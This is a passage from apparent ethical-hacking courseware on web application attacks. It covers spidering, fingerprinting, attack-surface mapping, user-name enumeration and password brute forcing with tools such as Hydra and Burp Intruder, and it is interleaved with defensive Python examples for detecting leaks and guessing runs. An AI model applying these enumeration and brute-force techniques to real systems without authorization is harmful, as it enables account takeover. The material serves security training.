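            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers


def analyze_banner(raw):
    """Report the product and version the Server header discloses, plus every other
    header that leaks infrastructure detail. An empty 'findings' list means the
    response gives an attacker nothing to look up in a vulnerability database."""
    status, headers = parse_headers(raw)
    report = {"status": status, "product": None, "version": None, "findings": []}
    server = headers.get("server", [""])[0]
    match = PRODUCT_RE.match(server)
    if match:
        report["product"], report["version"] = match.group(1), match.group(2)
    if report["version"]:
        report["findings"].append("Server header discloses product and version: " + server)
    elif report["product"]:
        report["findings"].append("Server header discloses product: " + server)
    for name in DISCLOSING_HEADERS:
        for value in headers.get(name, []):
            report["findings"].append(name + " header discloses infrastructure detail: " + value)
    return report


if __name__ == "__main__":
    for label, raw in (("leaky", LEAKY_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, analyze_banner(raw))
```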

113 Footprint Web Infrastructure: Hidden Content Discovery

Discover the hidden content and functionality that is not reachable from the main visible content to exploit user privileges within the application. It allows an attacker to recover backup copies of live files, configuration files and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality which is not linked to the main application, etc.

Web Spidering: Web spiders automatically discover the hidden content and functionality by parsing HTML forms and client-side JavaScript requests and responses. Web Spidering Tools: OWASP Zed Attack Proxy, Burp Spider, WebScarab

Attacker-Directed Spidering: The attacker accesses all of the application's functionality and uses an intercepting proxy to monitor all requests and responses. The intercepting proxy parses all of the application's responses and reports the content and functionality it discovers. Tool: OWASP Zed Attack Proxy

Brute Forcing: Use automation tools such as Burp Suite to make huge numbers of requests to the web server in order to guess the names or identifiers of hidden content and functionality.

Footprint Web Infrastructure: Hidden Content Discovery

Crucial business information such as prices of products, discounts, login IDs, and passwords is kept secret. This information is usually not visible to outsiders; it is usually stored in hidden form fields.
Discover the hidden content and functionality that is not reachable from the main visible content to exploit user privileges within the application. This allows an attacker to recover backup copies of live files, configuration files, and log files containing sensitive data, backup archives containing snapshots of files within the web root, new functionality that is not linked to the main application, etc. These hidden fields can be determined with the help of three techniques. They are:

Web Spidering

Web spiders automatically discover hidden content and functionality by parsing HTML forms and client-side JavaScript requests and responses. Tools that can be used to discover hidden content by means of web spidering include: OWASP Zed Attack Proxy, Burp Spider, WebScarab

Module 13 Page 1835

114 Attacker-Directed Spidering

An attacker accesses all of the application's functionality and uses an intercepting proxy to monitor all requests and responses. The intercepting proxy parses all of the application's responses and reports the content and functionality it discovers. The same tool used for web spidering, i.e., OWASP Zed Attack Proxy, can also be used for attacker-directed spidering.

Brute Forcing

Brute forcing is a very popular and easy method to attack web servers. Use automation tools such as Burp Suite to make large numbers of requests to the web server in order to guess the names or identifiers of hidden content and functionality.

Module 13 Page 1836
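A defender's counterpart to the brute-forcing technique above, as an added example that is not part of the module: a guessing run for hidden content leaves a burst of 404 responses from one client for many distinct paths no legitimate user requests. The access log lines below are constructed in Combined Log Format; the window, threshold and the guessed path names are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Combined Log Format lines: 10.0.0.5 is guessing names of hidden content
# (backup copies, configuration files, unlinked directories); 10.0.0.9 browses normally
# and hits one genuinely missing image.
SAMPLE_LOG = """\
10.0.0.9 - - [07/Jul/2011:10:08:16 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Jul/2011:10:08:17 +0000] "GET /backup.zip HTTP/1.1" 404 312 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Jul/2011:10:08:17 +0000] "GET /config.bak HTTP/1.1" 404 312 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Jul/2011:10:08:18 +0000] "GET /old/ HTTP/1.1" 404 312 "-" "Mozilla/5.0"
10.0.0.9 - - [07/Jul/2011:10:08:18 +0000] "GET /missing.png HTTP/1.1" 404 312 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Jul/2011:10:08:18 +0000] "GET /logs/ HTTP/1.1" 404 312 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Jul/2011:10:08:19 +0000] "GET /admin/ HTTP/1.1" 404 312 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Jul/2011:10:08:19 +0000] "GET /customers.aspx HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Jul/2011:10:08:20 +0000] "GET /web.config.old HTTP/1.1" 404 312 "-" "Mozilla/5.0"
10.0.0.9 - - [07/Jul/2011:10:15:00 +0000] "GET /customers.aspx HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_log(text):
    """Yield (ip, timestamp, path, status) for every well-formed line; skip the rest."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield (m.group("ip"), datetime.strptime(m.group("ts"), TS_FORMAT),
                   m.group("path"), int(m.group("status")))


def forced_browse_suspects(text, window=timedelta(seconds=60), threshold=5):
    """Return {ip: sorted distinct 404 paths} for every client that requested at
    least `threshold` distinct missing paths within any `window`. Counting distinct
    paths matters: one broken link reloaded many times is not a guessing run."""
    misses = defaultdict(list)  # ip -> [(timestamp, path)] for 404 responses only
    for ip, ts, path, status in parse_log(text):
        if status == 404:
            misses[ip].append((ts, path))
    suspects = {}
    for ip, hits in misses.items():
        hits.sort()
        for start in range(len(hits)):
            t0 = hits[start][0]
            in_window = {p for t, p in hits[start:] if t - t0 <= window}
            if len(in_window) >= threshold:
                suspects[ip] = sorted({p for _, p in hits})
                break
    return suspects


if __name__ == "__main__":
    for ip, paths in forced_browse_suspects(SAMPLE_LOG).items():
        print(ip, "requested", len(paths), "distinct missing paths:", ", ".join(paths))
```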

115 Web Spidering Using Burp Suite

Configure your web browser to use Burp as a local proxy. Access the entire target application, visiting every single link/URL possible, and submit all the application forms available. Browse the target application with JavaScript enabled and disabled, and with cookies enabled and disabled. Check the site map generated by the Burp proxy, and identify any hidden application content or functions. Continue these steps recursively until no further content or functionality is identified.

FIGURE: Burp Suite free edition, Intruder attack window (screenshot)

http://www.portswigger.net
Web Spidering Using Burp Suite

Source: http://www.portswigger.net

Burp Suite is an integrated platform for attacking web applications. It contains all the Burp tools with numerous interfaces between them, designed to facilitate and speed up the process of attacking an application. Burp Suite allows you to combine manual and automated techniques to enumerate, analyze, scan, attack, and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.

Web spidering using Burp Suite is done in the following manner:

1. Configure your web browser to use Burp as a local proxy
2. Access the entire target application, visiting every single link/URL possible, and submit all the application forms available
3. Browse the target application with JavaScript enabled and disabled, and with cookies enabled and disabled
4. Check the site map generated by the Burp proxy, and identify any hidden application content or functions

Module 13 Page 1837

116 5. Continue these steps recursively until no further content or functionality is identified

FIGURE: Burp Suite free edition, Intruder attack window (screenshot; captioned "Server Identification / Banner Grabbing" in the original)

Module 13 Page 1838

117 Web Spidering Using Mozenda Web Agent Builder

Mozenda Web Agent Builder crawls through a website and harvests pages of information.

Web Spidering Using Mozenda Web Agent Builder

Source: http://www.mozenda.com

Mozenda Web Agent Builder is a Windows application used to build your data extraction project. It crawls through a website and harvests pages of information. Web Agent Builder is a tool suite that includes an intuitive UI and a browser-based instruction set. Setting up your crawler is as simple as pointing and clicking to navigate pages and capture the information you want.

Module 13 Page 1839

118 FIGURE: Web Spidering Using Mozenda Web Agent Builder (screenshot)

Module 13 Page 1840

119 Web App Hacking Methodology: Attack Web Servers, Attack Authentication Mechanism, Attack Session Management Mechanism, Attack Data Connectivity, Attack Web Services

Web App Hacking Methodology: Attack Web Servers

Once you conduct full-scope footprinting of the web infrastructure, analyze the gathered information to find the vulnerabilities that can be exploited to launch attacks on web servers. Then attempt to attack web servers using the various techniques available. Each and every website or web application is associated with a web server that has code for serving the website or web application. The attacker exploits the vulnerabilities in the code and launches the attacks on the web server. Detailed information about hacking web servers will be explained on the following slides.

Module 13 Page 1841

120 Hacking Webservers

5. Once the attacker identifies the web server environment, he or she scans for known vulnerabilities by using a web server vulnerability scanner. Vulnerability scanning helps the attacker to launch the attack easily by identifying the exploitable vulnerabilities present on the web server. Once the attacker gathers all the potential vulnerabilities, he or she tries to exploit them with the help of various attack techniques to compromise the web server. In order to stop the web server from serving legitimate users or clients, the attacker launches a DoS attack against the web server. You can launch attacks on the vulnerable web server with the help of tools such as UrlScan, Nikto, Nessus, Acunetix Web Vulnerability Scanner, WebInspect, etc.

Module 13 Page 1842

121 Web Server Hacking Tool: WebInspect

WebInspect identifies security vulnerabilities in web applications. It runs interactive scans using a sophisticated user interface. An attacker can exploit identified vulnerabilities to carry out web services attacks.

https://download.hpsmartupdate.com

Webserver Hacking Tool: WebInspect

Source: https://download.hpsmartupdate.com

WebInspect software is web application security assessment software designed to thoroughly analyze today's complex web applications. It delivers fast scanning capabilities, broad assessment coverage, and accurate web application scanning results. It identifies security vulnerabilities that are undetectable by traditional scanners. Attackers can exploit the identified vulnerabilities for launching web services attacks.

Module 13 Page 1843

122 FIGURE: WebInspect tool screenshot

Module 13 Page 1844

123 Web App Hacking Methodology: Attack Web Servers, Attack Authentication Mechanism, Attack Session Management Mechanism, Attack Data Connectivity, Attack Web Services

Web App Hacking Methodology: Analyze Web Applications

Analyzing the web application helps you identify the different vulnerable points that an attacker can exploit to compromise the web application. Detailed information about analyzing a web application and identifying the entry points to break into the web application will be discussed on the following slides.

Module 13 Page 1845

124 Analyze Web Applications

Analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes.

Identify Entry Points for User Input: Review the generated HTTP requests to identify the input entry points
Identify Server-Side Functionality: Observe the applications revealed to the client to identify the server-side structure and functionality
Identify Server-Side Technologies: Fingerprint the technologies active on the server using various fingerprinting techniques such as HTTP fingerprinting
Map the Attack Surface: Identify the various attack surfaces uncovered by the applications and the vulnerabilities that are associated with each one

Analyze Web Applications

Web applications have various vulnerabilities. First, the attacker has to acquire basic knowledge of the web application, and then analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes.

Identify Entry Points for User Input

The entry points of an application also serve as entry points for attacks; they include the front-end web application that listens for HTTP requests. Review the generated HTTP requests to identify the user input entry points.

Identify Server-Side Functionality

Server-side functionality refers to the ability of a server to execute programs that produce web pages as output. These are scripts that reside on particular web servers and allow interactive web pages or websites to run on them. Observe the applications revealed to the client to identify the server-side structure and functionality.
Identify Server-Side Technologies

Server-side technologies, or server-side scripting, refers to the dynamic generation of web pages served by web servers, as opposed to static web pages that are held in the server's storage and served to web browsers as they are. Fingerprint the technologies active on the server using various fingerprinting techniques such as HTTP fingerprinting.

Module 13 Page 1846

125 Map the Attack Surface

Identify the various attack surfaces uncovered by the applications and the vulnerabilities that are associated with each one.

Module 13 Page 1847

126 Analyze Web Applications: Identify Entry Points for User Input

Examine the URL, HTTP headers, query string parameters, POST data, and cookies to determine all user input fields. Identify HTTP header parameters that can be processed by the application as user input, such as the User-Agent, Referer, Accept, Accept-Language, and Host headers. Determine the URL encoding techniques and other encryption measures implemented to secure the web traffic, such as SSL.

Tools used: Burp Suite, httprint, WebScarab, OWASP Zed Attack Proxy

Analyze Web Applications: Identify Entry Points for User Input

During the web application analysis, attackers identify entry points for user input so that they can understand the way the web application accepts or handles user input. Then the attacker tries to find the vulnerabilities present in the input mechanism and tries to exploit them so that the attacker can interact with or gain access to the web application.

Examine the URL, HTTP headers, query string parameters, POST data, and cookies to determine all user input fields.
Identify HTTP header parameters that can be processed by the application as user input, such as the User-Agent, Referer, Accept, Accept-Language, and Host headers.
Determine the URL encoding techniques and other encryption measures implemented to secure the web traffic, such as SSL.

The tools used to analyze web applications to identify entry points for user input include Burp Suite, httprint, WebScarab, OWASP Zed Attack Proxy, etc.

Module 13 Page 1848
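The entry-point inventory described above, as an added example that is not part of the module: given one captured request, list every location through which user-controlled data reaches the application (URL path, query string, the headers the module names, cookies and a form-encoded body), with each value URL-decoded so it reads as the server-side code will see it. The request is constructed, modelled on the module's juggyboy.com URL, and its header and cookie values are invented.

```python
from urllib.parse import urlsplit, parse_qsl, unquote

# Request headers the module names as being processed by applications as user input.
USER_CONTROLLED_HEADERS = ("host", "user-agent", "referer", "accept", "accept-language")

# Constructed request, modelled on the module's juggyboy.com URL; other values are invented.
SAMPLE_REQUEST = (
    "POST /customers.aspx?name=existing%20clients&isActive=0&showBy=name HTTP/1.1\r\n"
    "Host: www.juggyboy.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Referer: https://www.juggyboy.com/index.aspx\r\n"
    "Accept-Language: en-US,en;q=0.8\r\n"
    "Cookie: ASP.NET_SessionId=abc123; theme=dark%20mode\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 14\r\n"
    "\r\n"
    "q=bikes&page=2"
)


def parse_request(raw):
    """Split a raw HTTP request into (method, target, {lower-cased header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def entry_points(raw):
    """Return a list of (location, name, decoded value) triples, one per input the
    application may process. Seeing the decoded value is the point: what the
    transport shows as %20 or %2F is a space or a slash to the server-side code."""
    method, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    points = [("path", "", unquote(url.path))]
    points += [("query", n, v) for n, v in parse_qsl(url.query, keep_blank_values=True)]
    points += [("header", n, headers[n]) for n in USER_CONTROLLED_HEADERS if n in headers]
    for chunk in headers.get("cookie", "").split(";"):
        name, sep, value = chunk.strip().partition("=")
        if sep:
            points.append(("cookie", name, unquote(value)))
    form = headers.get("content-type", "").startswith("application/x-www-form-urlencoded")
    if method == "POST" and form:
        points += [("body", n, v) for n, v in parse_qsl(body, keep_blank_values=True)]
    return points


if __name__ == "__main__":
    for location, name, value in entry_points(SAMPLE_REQUEST):
        print(f"{location:7} {name:20} {value!r}")
```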

127 Analyze Web Applications: Identify Server-Side Technologies

Perform detailed server fingerprinting; analyze HTTP headers and HTML source code to identify server-side technologies. Examine URLs for file extensions, directories, and other identification information. Examine the error page messages. Examine session tokens: JSESSIONID - Java; ASPSESSIONID - IIS server; ASP.NET_SessionId - ASP.NET; PHPSESSID - PHP

(Slide screenshots: a list of reported web server banners such as Microsoft-IIS/6.0, Apache/2.0.32 (Fedora), SunONE WebServer 6.0 and Netscape-Enterprise/4.1, and an ASP.NET error page, "Server Error in '/ReportServer' Application. Could not find the permission set named 'ASP.Net'.", whose Version Information line discloses the Microsoft .NET Framework and ASP.NET versions)

Analyze Web Applications: Identify Server-Side Technologies

Source: http://net-square.com

After identifying the entry points through user inputs, attackers try to identify server-side technologies. The server-side technologies can be identified as follows:

1. Perform detailed server fingerprinting; analyze HTTP headers and HTML source code to identify server-side technologies
2. Examine URLs for file extensions, directories, and other identification information
3. Examine the error page messages
4. Examine session tokens: JSESSIONID - Java; ASPSESSIONID - IIS server; ASP.NET_SessionId - ASP.NET; PHPSESSID - PHP

Module 13 Page 1849

128 FIGURE: Identify Server-Side Technologies (web server fingerprinting report listing, for each host, the banner reported by the server and the banner deduced from its behaviour, for example Microsoft-IIS/6.0 reported and deduced, Apache/2.0.x deduced behind a bare "Apache" banner, and a host whose reported banner reads "Yes we are using ServerMask!" but is deduced as Microsoft IIS; plus the ASP.NET error page whose Version Information line discloses the .NET Framework and ASP.NET versions)

Module 13 Page 1850

129 Analyze Web Applications: Identify Server-Side Functionality

Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications.

Tools used: GNU Wget (gnu.org), Teleport Pro (tenmax.com), BlackWidow

Examine URL: SSL, ASPX platform
https://www.juggyboy.com/customers.aspx?name=existing%20clients&isActive=0&startDate=20%2F11%2F2010&endDate=20%2F05%2F2011&showBy=name

Analyze Web Applications: Identify Server-Side Functionality

Once the server-side technologies are determined, identify the server-side functionality. This helps you find the potential vulnerabilities in server-side functionality. Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications.

Tools Used:

Wget
Source: http://www.gnu.org
GNU Wget is for retrieving files using HTTP, HTTPS, and FTP, the most widely used Internet protocols. It is a non-interactive command-line tool, so it can be called from scripts, cron jobs, terminals without X Window support, etc.

Teleport Pro
Source: http://www.tenmax.com
Teleport Pro is an all-purpose high-speed tool for getting data from the Internet. Launch up to ten simultaneous retrieval threads, access password-protected sites, filter files by size and

Module 13 Page 1851

130 type, and search for keywords. Capable of reading HTML 4.0, CSS 2.0, and DHTML, Teleport can find all files available on all websites by means of web spidering, with server-side image map exploration, automatic dial-up connecting, Java applet support, variable exploration depths, project scheduling, and relinking abilities.

BlackWidow
Source:
BlackWidow scans a site and creates a complete profile of the site's structure, files, external links, and even link errors. BlackWidow will download all file types, such as pictures and images, audio and MP3, videos, documents, ZIP, programs, CSS, Macromedia Flash, .pdf, PHP, CGI, and HTM, to MIME types from any website. Download video and save it in many different video formats, such as YouTube, MySpace, Google, MKV, MPEG, AVI, DivX, XviD, MP4, 3GP, WMV, ASF, MOV, QT, VOB, etc. It can now be controlled programmatically using the built-in Script Interpreter.

Examine URL: SSL, ASPX platform, database column
https://www.juggyboy.com/customers.aspx?name=existing%20clients&isActive=0&startDate=20%2F11%2F2010&endDate=20%2F05%2F2011&showBy=name

FIGURE: BlackWidow

If a page URL starts with https instead of http, it is known as an SSL-certified page. If a page has an .aspx extension, chances are that the application is written using ASP.NET. If the query string has a parameter named showBy, you can assume that the application is using a database and displays the data by that value.

Module 13 Page 1852
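The fingerprinting rules from the Identify Server-Side Technologies section and the URL reading just above, as one added example that is not part of the module: each rule (https scheme, file extension, showBy parameter, session-token name, error-page version string) is applied to one URL, one set of Set-Cookie headers and one response body, and the independent pieces of evidence are collected so that a conclusion can be weighed by how many of them agree. The session-token names, the .aspx/showBy/https observations and the error-page wording are the module's; the extra file extensions, the sample cookie and the placeholder versions are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Session token names and the technology each one indicates, as listed in the module.
SESSION_TOKENS = {
    "JSESSIONID": "Java",
    "ASPSESSIONID": "IIS server (classic ASP)",
    "ASP.NET_SessionId": "ASP.NET",
    "PHPSESSID": "PHP",
}

# File extension -> platform. .aspx is the module's example; the rest extend it (assumption).
EXTENSIONS = {".aspx": "ASP.NET", ".asp": "classic ASP", ".jsp": "Java", ".php": "PHP"}

# Version strings an ASP.NET error page discloses; wording taken from the module's figure.
ERROR_PAGE_RE = re.compile(
    r"Microsoft \.NET Framework Version:\s*(?P<fw>[\w.]+);\s*ASP\.NET Version:\s*(?P<asp>[\w.]+)"
)

# Constructed inputs modelled on the module's URL and error page; X.Y.Z versions are placeholders.
SAMPLE_URL = ("https://www.juggyboy.com/customers.aspx?name=existing%20clients&isActive=0"
              "&startDate=20%2F11%2F2010&endDate=20%2F05%2F2011&showBy=name")
SAMPLE_COOKIES = ["ASP.NET_SessionId=abc123; path=/; HttpOnly"]
SAMPLE_BODY = ("<h1>Server Error in '/ReportServer' Application.</h1>"
               "Version Information: Microsoft .NET Framework Version:X.Y.Z; "
               "ASP.NET Version:X.Y.Z.W")


def fingerprint(url, set_cookie_headers, body=""):
    """Return a list of (evidence, conclusion) pairs, one per rule that fired."""
    findings = []
    parts = urlsplit(url)
    if parts.scheme == "https":
        findings.append(("https scheme", "SSL/TLS in use"))
    for ext, tech in EXTENSIONS.items():
        if parts.path.lower().endswith(ext):
            findings.append(("URL extension " + ext, tech))
    if "showBy" in parse_qs(parts.query):
        findings.append(("showBy parameter", "database-backed; results ordered by a column name"))
    for header in set_cookie_headers:
        name = header.split("=", 1)[0].strip()
        for token, tech in SESSION_TOKENS.items():
            # ASPSESSIONID is followed by a random suffix, so match on the prefix.
            if name.upper().startswith(token.upper()):
                findings.append(("session cookie " + name, tech))
    m = ERROR_PAGE_RE.search(body)
    if m:
        findings.append(("error page", "ASP.NET " + m.group("asp") + " on .NET Framework " + m.group("fw")))
    return findings


def technologies(findings):
    """Collapse the evidence list to the set of concluded technologies."""
    return {conclusion for _, conclusion in findings}


if __name__ == "__main__":
    for evidence, conclusion in fingerprint(SAMPLE_URL, SAMPLE_COOKIES, SAMPLE_BODY):
        print(f"{evidence:35} -> {conclusion}")
```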

131 Analyze Web Applications: Map the Attack Surface

Information                    Attack
Client-Side Validation         Injection Attack, Authentication Attack
Injection Attack               Privilege Escalation, Access Controls
Database Interaction           SQL Injection, Data Leakage
Cleartext Communication        Data Theft, Session Hijacking
File Upload and Download       Directory Traversal
Error Message                  Information Leakage
Display of User-Supplied Data  Cross-Site Scripting
Interaction                    Injection
Dynamic Redirects              Redirection, Header Injection
Application Codes              Buffer Overflows
Login                          Username Enumeration, Password Brute-Force
Third-Party Application        Known Vulnerabilities Exploitation
Session State                  Session Hijacking, Session Fixation
Web Server Software            Known Vulnerabilities Exploitation

Analyze Web Applications: Map the Attack Surface

There are various entry points through which attackers can compromise the network, so a proper analysis of the attack surface must be done. Mapping the attack surface includes thorough checking of the possible vulnerabilities through which an attack could be launched. The following are the various factors through which an attacker collects information and plans the kind of attack to be launched.

Module 13 Page 1853

132
Information                    Attack
Client-Side Validation         Injection Attack, Authentication Attack
Injection Attack               Privilege Escalation, Access Controls
Database Interaction           SQL Injection, Data Leakage
Cleartext Communication        Data Theft, Session Hijacking
File Upload and Download       Directory Traversal
Error Message                  Information Leakage
Display of User-Supplied Data  Cross-Site Scripting
Interaction                    Injection
Dynamic Redirects              Redirection, Header Injection
Application Codes              Buffer Overflows
Login                          Username Enumeration, Password Brute-Force
Third-Party Application        Known Vulnerabilities Exploitation
Session State                  Session Hijacking, Session Fixation
Web Server Software            Known Vulnerabilities Exploitation

FIGURE: Map the Attack Surface

Module 13 Page 1854

Web App Hacking Methodology

Attack Web Servers
Attack Authentication Mechanism
Attack Session Management Mechanism
Attack Data Connectivity
Attack Web Services

In web applications, the authentication functionality has many design loopholes, such as bad passwords (short or blank, common dictionary words or names, passwords set the same as the user name, and passwords still set to default values). The attacker can exploit vulnerabilities in the authentication mechanism to gain access to the web application or network. The various threats that exploit weaknesses in the authentication mechanism include network eavesdropping, brute-force attacks, dictionary attacks, cookie replay attacks, credential theft, etc.

Attack Authentication Mechanism

Most of the authentication mechanisms used by web applications have design flaws. If an attacker can identify those design flaws, he or she can easily exploit them and gain unauthorized access. The design flaws include failing to check password strength, insecure transportation of credentials over the Internet, etc. Web applications usually authenticate their clients or users based on a combination of user name and password. Hence, the authentication mechanism attack involves identifying and exploiting user names and passwords.

User Name Enumeration

User names can be enumerated in two ways: through verbose failure messages and through predictable user names.

Verbose Failure Messages

In a typical login system, the user is required to enter two pieces of information, that is, user name and password. In some cases, an application will ask for more information. If the user tries to log in and fails, it can be inferred that at least one of the pieces of information provided by the user is incorrect or inconsistent with the other information provided. If the application discloses which particular piece of the information provided by the user was incorrect or inconsistent, it gives an attacker ground to exploit the application.

Example:
Account <username> not found
The password provided is incorrect
Account <username> has been locked out

Predictable User Names

Some applications automatically generate account user names according to a predictable sequence. This makes it very easy for an attacker who can discern the sequence to build a potentially exhaustive list of all valid user names.

Password Attacks

Passwords are cracked based on:
Password functionality exploits
Password guessing
Brute-force attacks

Session Attacks

The following are the types of session attacks employed by the attacker to attack the authentication mechanism:
Session prediction
Session brute-forcing
Session poisoning

Cookie Exploitation

The following are the types of cookie exploitation attacks:
Cookie poisoning
Cookie sniffing
Cookie replay

User Name Enumeration

Source: https://wordpress.com

User name enumeration helps in guessing login IDs and passwords of users. If the login error states which part of the user name and password is not correct, guess the users of the application using the trial-and-error method. Look at the following picture, which shows enumerating user names from verbose failure messages:

FIGURE: User Name Enumeration (two WordPress.com login screenshots: logging in as "rini.matthews" returns "ERROR: Invalid username", while logging in as "rinimatthews" returns "ERROR: The password you entered for the username rinimatthews is incorrect"; the username rini.matthews does not exist, and the user name is successfully enumerated to rinimatthews)

Note: User name enumeration from verbose error messages will fail if the application implements an account lockout policy, i.e., locks the account after a certain number of failed login attempts. Some applications automatically generate account user names based on a sequence (such as user101, user102, etc.), and attackers can determine the sequence and enumerate valid user names.
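The following is an added example, not code from the CEH module or from WordPress: a login handler written the way the figure warns against (a different failure message for a missing user and for a wrong password) beside one that returns a single generic message, spends the same work on unknown user names, and applies the account lockout policy the note mentions. The user table, the hashing parameters, and the lockout threshold are assumptions made for this example.

```python
"""Added example, not code from the CEH module or from WordPress: verbose
versus generic login failure responses, plus an account-lockout counter.
The user table, hashing parameters and lockout threshold are assumptions."""
import hashlib
import hmac
import os
from dataclasses import dataclass

LOCKOUT_THRESHOLD = 5          # assumed policy: lock after 5 consecutive failures
DUMMY_SALT = b"\x00" * 16      # so unknown users cost the same time as known ones
GENERIC_FAILURE = "Invalid username or password"


def hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2-HMAC-SHA256 keeps the example self-contained; the iteration count is illustrative.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


@dataclass
class Account:
    salt: bytes
    pw_hash: bytes
    failures: int = 0
    locked: bool = False


def make_user_table(creds: dict) -> dict:
    """Build a salted, hashed user table from constructed plaintext credentials."""
    table = {}
    for user, password in creds.items():
        salt = os.urandom(16)
        table[user] = Account(salt, hash_password(password, salt))
    return table


def verbose_login(users: dict, username: str, password: str) -> str:
    """The flawed pattern from the figure: each failure path returns a
    different message, so a guesser learns which user names exist."""
    acct = users.get(username)
    if acct is None:
        return f"Username {username} does not exist"
    if not hmac.compare_digest(hash_password(password, acct.salt), acct.pw_hash):
        return f"The password you entered for the username {username} is incorrect"
    return "OK"


def hardened_login(users: dict, username: str, password: str) -> str:
    """Same credential check with one generic message for every failure
    path, equal work for unknown users, and a per-account lockout counter."""
    acct = users.get(username)
    if acct is None:
        hash_password(password, DUMMY_SALT)   # keep response time uniform
        return GENERIC_FAILURE
    if acct.locked:
        return GENERIC_FAILURE                # a locked account rejects even the right password
    if hmac.compare_digest(hash_password(password, acct.salt), acct.pw_hash):
        acct.failures = 0
        return "OK"
    acct.failures += 1
    if acct.failures >= LOCKOUT_THRESHOLD:
        acct.locked = True                    # an operator or timed unlock would reset this
    return GENERIC_FAILURE


# Constructed sample accounts; the user name mirrors the figure.
USERS = make_user_table({"rinimatthews": "S3cret!", "admin": "correct horse"})

if __name__ == "__main__":
    print(verbose_login(USERS, "rini.matthews", "x"))   # reveals the user does not exist
    print(verbose_login(USERS, "rinimatthews", "x"))    # reveals the user does exist
    print(hardened_login(USERS, "rini.matthews", "x"))  # same message either way
    print(hardened_login(USERS, "rinimatthews", "x"))
```

The generic message removes the oracle the figure relies on, and the dummy hash computation keeps the response time for an unknown user close to that of a known one, so timing does not become a second oracle. The lockout counter is what the note describes as defeating enumeration by brute force; an unlock path (operator reset or a timer) is left out of the example.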

Password Attacks: Password Functionality Exploits

Password attacks are the techniques used by the attacker for discovering passwords. Attackers exploit the password functionality so that they can bypass the authentication mechanism.

Password Changing

Determine the password change functionality within the application by spidering the application or creating a login account. Try random strings for the "Old Password", "New Password", and "Confirm the New Password" fields and analyze the errors to identify vulnerabilities in the password change functionality.

Password Recovery

"Forgot Password" features generally present a challenge to the user; if the number of attempts is not limited, attackers can guess the challenge answer successfully with the help of social engineering. Applications may also send a unique recovery URL or the existing password to an email address specified by the attacker if the challenge is solved.

Remember Me Exploit

"Remember Me" functions are implemented using a simple persistent cookie, such as Rememberuser=jason, or a persistent session identifier, such as Rememberuser=ABY. Attackers can use an enumerated user name or predict the session identifier to bypass authentication mechanisms.

Password Attacks: Password Guessing

Password guessing is a method where an attacker guesses various passwords until he or she gets the correct password, using the following methods: a password list, a password dictionary, and various tools.

Password List

Attackers create a list of possible passwords using the most commonly used passwords, footprinting of the target, and social engineering techniques, and try each password until the correct password is discovered.

Password Dictionary

Attackers can create a dictionary of all possible passwords using tools such as Dictionary Maker to perform dictionary attacks.

Tools Used for Password Guessing

Password guessing can be performed manually or using automated tools such as WebCracker, Brutus, Burp Intruder, THC-Hydra, etc.

THC-Hydra

Source: http://www.thc.org

THC-Hydra is a network logon cracker that supports many different services. This tool is proof-of-concept code, written to give researchers and security consultants the possibility to show how easy it would be to gain unauthorized remote access to a system.

FIGURE: THC-Hydra Tool Screenshot (the Hydra GTK front end with its Target, Passwords, Tuning, Specific, and Start tabs; a single user name and a password list file are configured, and the output pane shows Hydra, by van Hauser/THC, attacking the ftp service on port 21 with 32 parallel tasks and reporting one successful login)

In addition to these tools, Burp Intruder is also used for password guessing.

Password Attacks: Brute Forcing

Brute force is one of the methods used for cracking passwords. In a brute-forcing attack, attackers crack login passwords by trying all possible values from a set of alphabetic, numeric, and special characters. The main limitation of the brute-force attack is that it is only practical for identifying small passwords, such as two-character ones. Guessing becomes much harder when the password is longer and contains letters in both upper and lower case. If numbers and symbols are also used, then it might take more than a few years to guess the password, which is practically impossible. Password cracking tools commonly used by attackers include Burp Suite's Intruder, Brutus, Sensepost's Crowbar, etc.

Burp Suite's Intruder

Source: http://portswigger.net

Burp Intruder is a module of Burp Suite. It enables the user to automate penetration testing of web applications.

FIGURE: Burp Suite's Intruder Tool Screenshot (Burp Suite free edition, Intruder tab: the Positions and Payloads panes, with payload set 1 configured as a brute forcer over the character set abcdefghijklmnopqrstuvwxyz with a maximum length, and a "to uppercase" payload processing rule)

Brutus

Source: http://www.hoobie.net

Brutus is a remote password cracking tool. Brutus supports HTTP, POP3, FTP, SMB, Telnet, IMAP, NNTP, and many other authentication types. It includes a multi-stage authentication engine and can make 60 simultaneous target connections.

